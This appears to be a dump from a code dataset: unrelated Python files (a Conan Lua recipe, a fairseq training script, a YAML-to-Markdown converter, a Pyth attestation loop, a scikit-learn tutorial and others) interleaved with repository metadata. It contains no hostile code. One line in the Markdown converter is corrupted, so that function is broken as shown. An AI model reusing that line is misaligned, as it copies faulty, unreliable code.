# fac = FileAverageCalculator(open('data.txt'))
# print(fac.average()) # Call the template method
| 21.972222
| 78
| 0.583439
| 1,326
| 0.83818
| 0
| 0
| 107
| 0.067636
| 0
| 0
| 166
| 0.10493
|
b2a90936580b1ab7bbc9587223bca80795b6020a
| 2,906
|
py
|
Python
|
conanfile.py
|
helmesjo/conan-lua
|
da8f0c54ac9d1949c6ac64d9ab64639df8226061
|
[
"MIT"
] | null | null | null |
conanfile.py
|
helmesjo/conan-lua
|
da8f0c54ac9d1949c6ac64d9ab64639df8226061
|
[
"MIT"
] | 1
|
2019-12-26T18:53:06.000Z
|
2020-02-12T13:45:40.000Z
|
conanfile.py
|
helmesjo/conan-lua
|
da8f0c54ac9d1949c6ac64d9ab64639df8226061
|
[
"MIT"
] | null | null | null |
from conans import ConanFile, CMake, tools
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
class LuaConan(ConanFile):
name = "Lua"
version = "5.3.5"
description = "Lua is a powerful, fast, lightweight, embeddable scripting language."
# topics can get used for searches, GitHub topics, Bintray tags etc. Add here keywords about the library
topics = ("conan", "lua", "scripting", "embedded")
url = "https://github.com/helmesjo/conan-lua"
homepage = "https://www.lua.org"
author = "helmesjo <helmesjo@live.com>"
license = "MIT" # Indicates license type of the packaged library; please use SPDX Identifiers https://spdx.org/licenses/
exports = ["LICENSE.md"] # Packages the license for the conanfile.py
# Remove following lines if the target lib does not use cmake.
exports_sources = ["CMakeLists.txt"]
generators = "cmake"
# Options may need to change depending on the packaged library.
settings = "os", "arch", "compiler", "build_type"
options = {"shared": [False], "fPIC": [True, False]}
default_options = {"shared": False, "fPIC": True}
# Custom attributes for Bincrafters recipe conventions
_source_subfolder = "source_subfolder"
_build_subfolder = "build_subfolder"
requires = ()
def config_options(self):
if self.settings.os == 'Windows':
del self.options.fPIC
def source(self):
source_url = "https://www.lua.org"
tools.get("{0}/ftp/lua-{1}.tar.gz".format(source_url, self.version), sha256="0c2eed3f960446e1a3e4b9a1ca2f3ff893b6ce41942cf54d5dd59ab4b3b058ac")
extracted_dir = "lua-" + self.version
# Rename to "source_subfolder" is a convention to simplify later steps
os.rename(extracted_dir, self._source_subfolder)
# For some reason uid & gid are wrong in some situations when renaming the unziped tar (happened in docker-in-docker configuration)
# Set it explicitly to match the current user & group
if os.name == "posix":
if os.system("chown -R {0}:{1} {2}".format(os.getuid(), os.getgid(), self._source_subfolder)) != 0:
self.output.error("Failed to change owner of source to current user & group id ({0}:{1})".format(os.getuid(), os.getgid()))
def _configure_cmake(self):
cmake = CMake(self)
cmake.definitions["SOURCE_SUBDIR"] = self._source_subfolder
cmake.configure(build_folder=self._build_subfolder)
return cmake
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
cmake = self._configure_cmake()
cmake.install()
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
self.cpp_info.includedirs.append("include/lua")
| 42.735294
| 151
| 0.66724
| 2,795
| 0.961803
| 0
| 0
| 0
| 0
| 0
| 0
| 1,297
| 0.446318
|
b2a93406f378840531084977a82ef40530d2aedf
| 3,800
|
py
|
Python
|
train.py
|
mcao610/My_BART
|
0f5963ff8688986e28b2ff94a9cc7a3a0adcf3a3
|
[
"MIT"
] | null | null | null |
train.py
|
mcao610/My_BART
|
0f5963ff8688986e28b2ff94a9cc7a3a0adcf3a3
|
[
"MIT"
] | null | null | null |
train.py
|
mcao610/My_BART
|
0f5963ff8688986e28b2ff94a9cc7a3a0adcf3a3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import torch
import logging
import torch.distributed as dist
import torch.multiprocessing as mp
from torch.utils.data import Dataset, DataLoader, BatchSampler
from torch.utils.data.distributed import DistributedSampler
from fairseq.tasks.translation import TranslationTask
from fairseq.data.language_pair_dataset import collate
from modules.data_utils import FairseqDataset
from modules.trainer import Trainer
from modules.utils import init_arg_parser
logging.basicConfig(
format='%(asctime)s | %(levelname)s | %(name)s | %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO,
stream=sys.stdout,
)
logger = logging.getLogger('fairseq.train')
def cleanup():
dist.destroy_process_group()
def setup(rank, world_size):
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '12355'
# initialize the process group
dist.init_process_group("nccl", rank=rank, world_size=world_size)
def load_dictionary(path, src_dict_name='source', tgt_dict_name='target'):
"""Load source & target fairseq dictionary.
"""
# path = self.args.data_name_or_path
src_dict = TranslationTask.load_dictionary(os.path.join(path, 'dict.{}.txt'.format(src_dict_name)))
tgt_dict = TranslationTask.load_dictionary(os.path.join(path, 'dict.{}.txt'.format(tgt_dict_name)))
assert src_dict.bos() == tgt_dict.bos() == 0
assert src_dict.pad() == tgt_dict.pad() == 1
assert src_dict.eos() == tgt_dict.eos() == 2
assert src_dict.unk() == tgt_dict.unk() == 3
logger.info('[{}] dictionary: {} types'.format('source', len(src_dict)))
logger.info('[{}] dictionary: {} types'.format('target', len(tgt_dict)))
return src_dict, tgt_dict
def main(rank, args, world_size):
if rank == 0:
logger.info(vars(args))
# create task & load source and taget dictionary
# translation_task = TranslationTask.setup_task(args)
logger.info(f"Running DDP on rank {rank}.")
setup(rank, world_size)
# build trainer
logger.info('- build trainer (rank {})...'.format(rank))
trainer = Trainer(args, logger, rank)
src_dict, tgt_dict = trainer.get_dicts()
# create datasets
logger.info('- loading training set (rank {})...'.format(rank))
train_dataset = FairseqDataset(src_dict, args.train_source, args.train_target,
max_positions=args.max_positions, no_bos=args.no_bos)
logger.info('- loading development set (rank {})...'.format(rank))
dev_dataset = FairseqDataset(src_dict, args.dev_source, args.dev_target,
max_positions=args.max_positions, no_bos=False)
torch.distributed.barrier() # make sure all datasets are loaded
def collate_fn(samples):
"""
Args:
samples: list of samples
"""
return collate(samples, train_dataset.pad_idx, train_dataset.eos_idx,
left_pad_source=True,
left_pad_target=False,
input_feeding=True)
train_sampler = DistributedSampler(train_dataset, num_replicas=world_size, rank=rank, shuffle=True)
train_dataloader = DataLoader(train_dataset, batch_size=args.batch_size, sampler=train_sampler,
collate_fn=collate_fn, pin_memory=True)
# train model
trainer.train(train_dataloader, train_sampler, dev_dataset, None)
# finish process
cleanup()
if __name__ == "__main__":
parser = init_arg_parser()
# TranslationTask.add_args(parser)
args = parser.parse_args()
# main(args)
n_gpus = torch.cuda.device_count()
mp.spawn(main,
args=(args, n_gpus),
nprocs=n_gpus,
join=True)
| 31.932773
| 103
| 0.669737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 867
| 0.228158
|
b2aa5d4587a6ca679b22dbefb38488aae64a9c0e
| 4,555
|
py
|
Python
|
yaml-to-md.py
|
phlummox/pptx-to-md
|
6bd16c9cdf28946cd0ab9b8766b6eea1410de705
|
[
"Unlicense"
] | 2
|
2022-02-19T11:45:56.000Z
|
2022-03-07T13:34:09.000Z
|
yaml-to-md.py
|
phlummox/pptx-to-md
|
6bd16c9cdf28946cd0ab9b8766b6eea1410de705
|
[
"Unlicense"
] | null | null | null |
yaml-to-md.py
|
phlummox/pptx-to-md
|
6bd16c9cdf28946cd0ab9b8766b6eea1410de705
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python3
"""
intermediate yaml to markdown conversion
"""
import sys
import yaml
def yaml_to_markdown(yaml, outfile):
"""Given a list of dicts representing PowerPoint slides
-- presumably loaded from a YAML file -- convert to
markdown and print the result on the file-like
object 'outfile'.
"""
for slide in yaml:
slide_to_markdown(slide, outfile)
def get_title(slide):
"""return title or None. Deletes title from dict"""
shapes = slide["conts"]
found = False
for i, shape in enumerate(shapes):
if shape["ShapeType"] == "com.sun.star.presentation.TitleTextShape":
found = True
title = shape
break
if found:
del shapes[i]
return title["String"].replace("\n", " ")
def slide_to_markdown(slide, outfile):
shapes = slide["conts"]
title = get_title(slide)
if not title:
title = "SLIDE"
print("### " + title + "\n", file=outfile)
for shape in shapes:
if shape["ShapeType"] == "com.sun.star.drawing.GraphicObjectShape":
add_graphic(shape, outfile)
# all Groups should've been converted to SVG
elif shape["ShapeType"] == "com.sun.star.drawing.GroupShape":
print("grouping ...\nslide title: ", title)
add_graphic(shape, outfile)
elif shape["ShapeType"] == "com.sun.star.presentation.TitleTextShape":
out_str = "(TABLE not converted from PowerPoint)"
print(out_str + "\n", file=outfile)
elif "elements" in shape:
add_list(shape, outfile)
elif "String" in shape and shape["String"]:
add_text(shape, outfile)
else:
out_str = "<!-- sl: %(slideNum)s, shp: %(shapeNum)s, type: %(shapeType)s !-->" % {
"slideNum" : slide["slideNum"],
"shapeNum" : shape["shapeNum"],
"shapeType" : shape["ShapeType"] }
print(out_str + "\n", file=outfile)
def add_text(shape, outfile):
"""
convert a text-like Shape to a string, and
print to 'outfile'
"""
print( shape["String"].strip() + "\n", file=outfile)
def add_list(shape, outfile):
"""
Given a shape that represents an 'Outline' --
OpenOffice's representation of a bulleted or numbered
list -- attempt to convert the elements into
a sensible Markdown list, and write to
"outfile".
"""
els = shape["elements"]
indent = 0
def item_to_str(item):
s = (' ' * indent * 4) + "- " + item["String"].strip()
return s
# handle first item
output = [item_to_str(els[0])]
def dump_output():
print( "\n".join(output) + "\n", file=outfile)
if len(els) == 1:
dump_output()
return
# handle rest of items
last_el = els[0]
for el in els[1:]:
# int-ify the level if None
if el["NumberingLevel"] is None:
el["NumberingLevel"] = 0
if last_el["NumberingLevel"] is None:
last_el["NumberingLevel"] = 0
# new indent
if el["NumberingLevel"] > last_el["NumberingLevel"]:
indent += 1
elif el["NumberingLevel"] < last_el["NumberingLevel"]:
indent = max(0, indent-1)
else:
pass
#print(" new indent:", indent)
if len(el["String"]) > 1:
output.append(item_to_str(el))
last_el = el
dump_output()
def add_graphic(shape, outfile):
"""
Given a Shape representing some graphics object
(e.g. jpg, png, MetaFile, SVG), write out
the markdown to show it on "outfile".
"""
if "String" in shape and shape["String"]:
alt_text = shape["String"]
else:
alt_text = ""
if "exported_svg_filename" in shape:
filename = shape["exported_svg_filename"]
else:
filename = shape["exported_filename"]
link = "s)" % { "alt_text" : alt_text,
"filename" : filename }
print(link + "\n", file=outfile)
# typical image types:
# image/jpeg, image/png, image/gif
# text shapes:
# TextShape, NotesShape, SubtitleShape, OutlinerShape,
# TitleTextShape, ?CustomShape, possibly ?RectangleShape
def convert_file(input_file, output_file):
"""start an soffice server, then convert input file to output file
using image dir."""
with open(input_file, "r") as input:
y = yaml.load(input, Loader=yaml.SafeLoader)
with open(output_file, "w") as output:
yaml_to_markdown(y, output)
MAIN="__main__"
#MAIN=None
def main():
"""main"""
args = sys.argv[1:]
if len(args) != 2:
print("usage: pptx-to-md.py INPUT_FILE OUTPUT_FILE")
sys.exit(1)
input_file, output_file = args
convert_file(input_file, output_file)
if __name__ == MAIN:
main()
| 25.305556
| 88
| 0.630077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,063
| 0.452909
|
b2aacb8c58e5a1abfc8fe218bf0ba965384b2044
| 1,032
|
py
|
Python
|
library/real/display_real.py
|
console-beaver/MIT-Racecar-cbeast
|
f7f9c156e7072da7acc680ae1ad1de344253ae05
|
[
"MIT"
] | null | null | null |
library/real/display_real.py
|
console-beaver/MIT-Racecar-cbeast
|
f7f9c156e7072da7acc680ae1ad1de344253ae05
|
[
"MIT"
] | null | null | null |
library/real/display_real.py
|
console-beaver/MIT-Racecar-cbeast
|
f7f9c156e7072da7acc680ae1ad1de344253ae05
|
[
"MIT"
] | null | null | null |
"""
Copyright Harvey Mudd College
MIT License
Spring 2020
Contains the Display module of the racecar_core library
"""
import cv2 as cv
import os
from nptyping import NDArray
from display import Display
class DisplayReal(Display):
__WINDOW_NAME: str = "RACECAR display window"
__DISPLAY: str = ":1"
def __init__(self):
self.__display_found = (
self.__DISPLAY
in os.popen(
"cd /tmp/.X11-unix && for x in X*; do echo \":${x#X}\"; done "
).read()
)
if self.__display_found:
os.environ["DISPLAY"] = self.__DISPLAY
else:
print(f"Display {self.__DISPLAY} not found.")
def create_window(self) -> None:
if self.__display_found:
cv.namedWindow(self.__WINDOW_NAME)
else:
pass
def show_color_image(self, image: NDArray) -> None:
if self.__display_found:
cv.imshow(self.__WINDOW_NAME, image)
cv.waitKey(1)
else:
pass
| 23.454545
| 78
| 0.587209
| 825
| 0.799419
| 0
| 0
| 0
| 0
| 0
| 0
| 255
| 0.247093
|
b2ad711075be04cba1f9b409149e9a9fc3958436
| 749
|
py
|
Python
|
DominantSparseEigenAD/tests/demos/2ndderivative.py
|
buwantaiji/DominantSparseEigenAD
|
36d534b6713ba256309b07116ebc542bee01cd51
|
[
"Apache-2.0"
] | 23
|
2019-10-29T03:35:18.000Z
|
2022-02-11T16:38:24.000Z
|
DominantSparseEigenAD/tests/demos/2ndderivative.py
|
navyTensor/DominantSparseEigenAD
|
3a5ac361edafd82f98ecf4d9fcad5c4e0b242178
|
[
"Apache-2.0"
] | null | null | null |
DominantSparseEigenAD/tests/demos/2ndderivative.py
|
navyTensor/DominantSparseEigenAD
|
3a5ac361edafd82f98ecf4d9fcad5c4e0b242178
|
[
"Apache-2.0"
] | 6
|
2019-11-06T09:09:45.000Z
|
2022-02-09T06:24:15.000Z
|
"""
A small toy example demonstrating how the process of computing 1st
derivative can be added to the original computation graph to produce an enlarged
graph whose back-propagation yields the 2nd derivative.
"""
import torch
x = torch.randn(10, requires_grad=True)
exp = torch.exp(x)
cos = torch.cos(x)
y = exp * cos
cosbar = exp
expbar = cos
minussin = -torch.sin(x)
grad1 = cosbar * minussin
grad2 = expbar * exp
dydx = grad1 + grad2
d2ydx2 = torch.autograd.grad(dydx, x, grad_outputs=torch.ones(dydx.shape[0]))
print("y: ", y, "\ngroundtruth: ", torch.exp(x) * torch.cos(x))
print("dy/dx: ", dydx, "\ngroundtruth: ", torch.exp(x) * (torch.cos(x)- torch.sin(x)))
print("d2y/dx2: ", d2ydx2, "\ngroundtruth", -2 * torch.exp(x) * torch.sin(x))
| 32.565217
| 86
| 0.695594
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 289
| 0.385848
|
b2adb9d7006450ffeda3b214aef1de0a2d913357
| 1,335
|
py
|
Python
|
test_default.py
|
dukedhx/tokenflex-reporting-python-script
|
f837b4e4a1cf388620da94abbaddab6bcabd51a8
|
[
"MIT"
] | 4
|
2018-12-17T09:09:44.000Z
|
2020-12-15T16:35:47.000Z
|
test_default.py
|
dukedhx/tokenflex-reporting-python-script
|
f837b4e4a1cf388620da94abbaddab6bcabd51a8
|
[
"MIT"
] | null | null | null |
test_default.py
|
dukedhx/tokenflex-reporting-python-script
|
f837b4e4a1cf388620da94abbaddab6bcabd51a8
|
[
"MIT"
] | 4
|
2019-09-01T10:08:32.000Z
|
2021-01-09T10:12:46.000Z
|
#####################################################################
## Copyright (c) Autodesk, Inc. All rights reserved
## Written by Forge Partner Development
##
## Permission to use, copy, modify, and distribute this software in
## object code form for any purpose and without fee is hereby granted,
## provided that the above copyright notice appears in all copies and
## that both that copyright notice and the limited warranty and
## restricted rights notice below appear in all supporting
## documentation.
##
## AUTODESK PROVIDES THIS PROGRAM "AS IS" AND WITH ALL FAULTS.
## AUTODESK SPECIFICALLY DISCLAIMS ANY IMPLIED WARRANTY OF
## MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. AUTODESK, INC.
## DOES NOT WARRANT THAT THE OPERATION OF THE PROGRAM WILL BE
## UNINTERRUPTED OR ERROR FREE.
#####################################################################
import simple_http_server as SimpleHTTPServer
import consumption_reporting as ConsumptionReporting
from threading import Thread
from time import sleep
import pytest
@pytest.mark.skip()
def shutdownServer():
sleep(30)
SimpleHTTPServer.httpd.shutdown()
def testServer():
thread = Thread(target=shutdownServer)
thread.start()
SimpleHTTPServer.startHttpServer()
thread.join()
def testConsumption():
ConsumptionReporting.start(None)
| 32.560976
| 70
| 0.691386
| 0
| 0
| 0
| 0
| 93
| 0.069663
| 0
| 0
| 855
| 0.640449
|
b2ae0f0ae136e69e9eedb942d08d354586e0fafa
| 4,850
|
py
|
Python
|
HyperAPI/hdp_api/routes/nitro.py
|
RomainGeffraye/HyperAPI
|
6bcd831ee48abb3a4f67f85051bc0d2a07c7aaef
|
[
"BSD-3-Clause"
] | null | null | null |
HyperAPI/hdp_api/routes/nitro.py
|
RomainGeffraye/HyperAPI
|
6bcd831ee48abb3a4f67f85051bc0d2a07c7aaef
|
[
"BSD-3-Clause"
] | null | null | null |
HyperAPI/hdp_api/routes/nitro.py
|
RomainGeffraye/HyperAPI
|
6bcd831ee48abb3a4f67f85051bc0d2a07c7aaef
|
[
"BSD-3-Clause"
] | null | null | null |
from HyperAPI.hdp_api.routes import Resource, Route
from HyperAPI.hdp_api.routes.base.version_management import available_since
class Nitro(Resource):
name = "nitro"
class _getForecasts(Route):
name = "getForecasts"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID
}
class _getForecast(Route):
name = "getForecast"
httpMethod = Route.GET
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
class _insertForecast(Route):
name = "insertForecast"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/add"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID
}
class _updateForecast(Route):
name = "updateForecast"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
@available_since('2.0')
class _updateForecastCoef(Route):
name = "updateForecastCoef"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/tunes/updatecoef"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
class _deleteForecast(Route):
name = "deleteForecast"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/delete"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
class _getForecastTunes(Route):
name = "getForecastTunes"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/tunes"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
class _updateForecastTunes(Route):
name = "updateForecastTunes"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/tunes/update"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
class _getForecastTunesAggregateGeo(Route):
name = "getForecastTunesAggregateGeo"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/tunes/aggregate/geo"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
class _getForecastTunesAggregateDepot(Route):
name = "getForecastTunesAggregateDepot"
httpMethod = Route.POST
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/tunes/aggregate/depot"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
class _exportForecastTunes(Route):
name = "exportForecastTunes"
httpMethod = Route.GET
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/tunes/export"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
@available_since('2.0')
class _exportReport(Route):
name = "exportReport"
httpMethod = Route.GET
path = "/nitro/projects/{project_ID}/datasets/{dataset_ID}/forecasts/{forecast_ID}/tunes/exportreport"
_path_keys = {
'project_ID': Route.VALIDATOR_OBJECTID,
'dataset_ID': Route.VALIDATOR_OBJECTID,
'forecast_ID': Route.VALIDATOR_OBJECTID
}
| 38.188976
| 113
| 0.640412
| 4,719
| 0.97299
| 0
| 0
| 843
| 0.173814
| 0
| 0
| 1,671
| 0.344536
|
b2b1ab378336c1f38be58369252277dd0f368208
| 4,883
|
py
|
Python
|
third_party/pyth/p2w_autoattest.py
|
dendisuhubdy/wormhole
|
29cd5a3934aaf489a1b7aa45495414c5cb974c82
|
[
"Apache-2.0"
] | 695
|
2020-08-29T22:42:51.000Z
|
2022-03-31T05:33:57.000Z
|
third_party/pyth/p2w_autoattest.py
|
dendisuhubdy/wormhole
|
29cd5a3934aaf489a1b7aa45495414c5cb974c82
|
[
"Apache-2.0"
] | 478
|
2020-08-30T16:48:42.000Z
|
2022-03-30T23:00:11.000Z
|
third_party/pyth/p2w_autoattest.py
|
dendisuhubdy/wormhole
|
29cd5a3934aaf489a1b7aa45495414c5cb974c82
|
[
"Apache-2.0"
] | 230
|
2020-10-19T06:44:13.000Z
|
2022-03-28T11:11:47.000Z
|
#!/usr/bin/env python3
# This script sets up a simple loop for periodical attestation of Pyth data
from pyth_utils import *
from http.client import HTTPConnection
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
import os
import re
import subprocess
import time
import threading
P2W_ADDRESS = "P2WH424242424242424242424242424242424242424"
P2W_ATTEST_INTERVAL = float(os.environ.get("P2W_ATTEST_INTERVAL", 5))
P2W_OWNER_KEYPAIR = os.environ.get(
"P2W_OWNER_KEYPAIR", f"/usr/src/solana/keys/p2w_owner.json")
P2W_ATTESTATIONS_PORT = int(os.environ.get("P2W_ATTESTATIONS_PORT", 4343))
PYTH_ACCOUNTS_HOST = "pyth"
PYTH_ACCOUNTS_PORT = 4242
WORMHOLE_ADDRESS = "Bridge1p5gheXUvJ6jGWGeCsgPKgnE3YgdGKRVCMY9o"
ATTESTATIONS = {
"pendingSeqnos": [],
}
class P2WAutoattestStatusEndpoint(BaseHTTPRequestHandler):
"""
A dumb endpoint for last attested price metadata.
"""
def do_GET(self):
print(f"Got path {self.path}")
sys.stdout.flush()
data = json.dumps(ATTESTATIONS).encode("utf-8")
print(f"Sending:\n{data}")
ATTESTATIONS["pendingSeqnos"] = []
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(data)))
self.end_headers()
self.wfile.write(data)
self.wfile.flush()
def serve_attestations():
"""
Run a barebones HTTP server to share Pyth2wormhole attestation history
"""
server_address = ('', P2W_ATTESTATIONS_PORT)
httpd = HTTPServer(server_address, P2WAutoattestStatusEndpoint)
httpd.serve_forever()
# Get actor pubkeys
P2W_OWNER_ADDRESS = sol_run_or_die(
"address", ["--keypair", P2W_OWNER_KEYPAIR], capture_output=True).stdout.strip()
PYTH_OWNER_ADDRESS = sol_run_or_die(
"address", ["--keypair", PYTH_PROGRAM_KEYPAIR], capture_output=True).stdout.strip()
# Top up pyth2wormhole owner
sol_run_or_die("airdrop", [
str(SOL_AIRDROP_AMT),
"--keypair", P2W_OWNER_KEYPAIR,
"--commitment", "finalized",
], capture_output=True)
# Initialize pyth2wormhole
init_result = run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"init",
"--wh-prog", WORMHOLE_ADDRESS,
"--owner", P2W_OWNER_ADDRESS,
"--pyth-owner", PYTH_OWNER_ADDRESS,
], capture_output=True, die=False)
if init_result.returncode != 0:
print("NOTE: pyth2wormhole-client init failed, retrying with set_config")
run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"set-config",
"--owner", P2W_OWNER_KEYPAIR,
"--new-owner", P2W_OWNER_ADDRESS,
"--new-wh-prog", WORMHOLE_ADDRESS,
"--new-pyth-owner", PYTH_OWNER_ADDRESS,
], capture_output=True)
# Retrieve current price/product pubkeys from the pyth publisher
conn = HTTPConnection(PYTH_ACCOUNTS_HOST, PYTH_ACCOUNTS_PORT)
conn.request("GET", "/")
res = conn.getresponse()
pyth_accounts = None
if res.getheader("Content-Type") == "application/json":
pyth_accounts = json.load(res)
else:
print(f"Bad Content type {res.getheader('Content-Type')}", file=sys.stderr)
sys.exit(1)
price_addr = pyth_accounts["price"]
product_addr = pyth_accounts["product"]
nonce = 0
attest_result = run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"attest",
"--price", price_addr,
"--product", product_addr,
"--nonce", str(nonce),
], capture_output=True)
print("p2w_autoattest ready to roll.")
print(f"ACCOUNTS: {pyth_accounts}")
print(f"Attest Interval: {P2W_ATTEST_INTERVAL}")
# Serve p2w endpoint
endpoint_thread = threading.Thread(target=serve_attestations, daemon=True)
endpoint_thread.start()
# Let k8s know the service is up
readiness_thread = threading.Thread(target=readiness, daemon=True)
readiness_thread.start()
seqno_regex = re.compile(r"^Sequence number: (\d+)")
nonce = 1
while True:
attest_result = run_or_die([
"pyth2wormhole-client",
"--log-level", "4",
"--p2w-addr", P2W_ADDRESS,
"--rpc-url", SOL_RPC_URL,
"--payer", P2W_OWNER_KEYPAIR,
"attest",
"--price", price_addr,
"--product", product_addr,
"--nonce", str(nonce),
], capture_output=True)
time.sleep(P2W_ATTEST_INTERVAL)
matches = seqno_regex.match(attest_result.stdout)
if matches is not None:
seqno = int(matches.group(1))
print(f"Got seqno {seqno}")
ATTESTATIONS["pendingSeqnos"].append(seqno)
else:
print(f"Warning: Could not get sequence number")
nonce += 1
readiness_thread.join()
| 27.587571
| 87
| 0.683596
| 590
| 0.120827
| 0
| 0
| 0
| 0
| 0
| 0
| 1,684
| 0.34487
|
a22accaa90f9f185eea9b823f9c8bb986540fecb
| 3,644
|
py
|
Python
|
hands-on_introduction/3 - model_validation.py
|
varunpandey0502/skyfi_labs_ml_workshop
|
6a209a16ca3674c1d2cd75e4dcc2e695f50dc583
|
[
"MIT"
] | null | null | null |
hands-on_introduction/3 - model_validation.py
|
varunpandey0502/skyfi_labs_ml_workshop
|
6a209a16ca3674c1d2cd75e4dcc2e695f50dc583
|
[
"MIT"
] | null | null | null |
hands-on_introduction/3 - model_validation.py
|
varunpandey0502/skyfi_labs_ml_workshop
|
6a209a16ca3674c1d2cd75e4dcc2e695f50dc583
|
[
"MIT"
] | null | null | null |
import pandas as pd
melbourne_file_path = './melbourne_housing_data.csv'
melbourne_data = pd.read_csv(melbourne_file_path)
melbourne_data = melbourne_data.dropna(axis=0)
y = melbourne_data.Price
melbourne_features = ['Rooms','Bathroom','Landsize','Lattitude','Longtitude']
X = melbourne_data[melbourne_features]
X.describe()
X.head(n=10)
from sklearn.tree import DecisionTreeRegressor
melbourne_model = DecisionTreeRegressor(random_state=1)
#Fit model
melbourne_model.fit(X,y)
#Make predictions for first five rows
#print(X.head())
#Predictions
#print(melbourne_model.predict(X.head()))
#What is Model Validation
#You'll want to evaluate almost every model you ever build. In most (though not all) applications, the relevant measure of model quality is predictive accuracy. In other words, will the model's predictions be close to what actually happens.
#
#Many people make a huge mistake when measuring predictive accuracy. They make predictions with their training data and compare those predictions to the target values in the training data. You'll see the problem with this approach and how to solve it in a moment, but let's think about how we'd do this first.
#
#You'd first need to summarize the model quality in an understandable way. If you compare predicted and actual home values for 10,000 houses, you'll likely find a mix of good and bad predictions. Looking through a list of 10,000 predicted and actual values would be pointless. We need to summarize this into a single metric.
#
#There are many metrics for summarizing model quality, but we'll start with one called Mean Absolute Error (also called MAE). Let's break down this metric starting with the last word, error.
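#As a tiny worked example: if the actual prices are [100, 200, 300] and the model
#predicts [110, 190, 330], the absolute errors are [10, 10, 30], so the MAE is
#(10 + 10 + 30) / 3 = 16.67 -- "on average, our predictions are off by about 16.7".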
from sklearn.metrics import mean_absolute_error
predicted_home_prices = melbourne_model.predict(X)
mean_absolute_error(y,predicted_home_prices)
#The Problem with "In-Sample" Scores
#The measure we just computed can be called an "in-sample" score. We used a single "sample" of houses for both building the model and evaluating it. Here's why this is bad.
#
#Imagine that, in the large real estate market, door color is unrelated to home price.
#
#However, in the sample of data you used to build the model, all homes with green doors were very expensive. The model's job is to find patterns that predict home prices, so it will see this pattern, and it will always predict high prices for homes with green doors.
#
#Since this pattern was derived from the training data, the model will appear accurate in the training data.
#
#But if this pattern doesn't hold when the model sees new data, the model would be very inaccurate when used in practice.
#
#Since a model's practical value comes from making predictions on new data, we measure performance on data that wasn't used to build the model. The most straightforward way to do this is to exclude some data from the model-building process, and then use that data to test the model's accuracy on data it hasn't seen before. This data is called validation data.
from sklearn.model_selection import train_test_split
# split data into training and validation data, for both features and target
# The split is based on a random number generator. Supplying a numeric value to
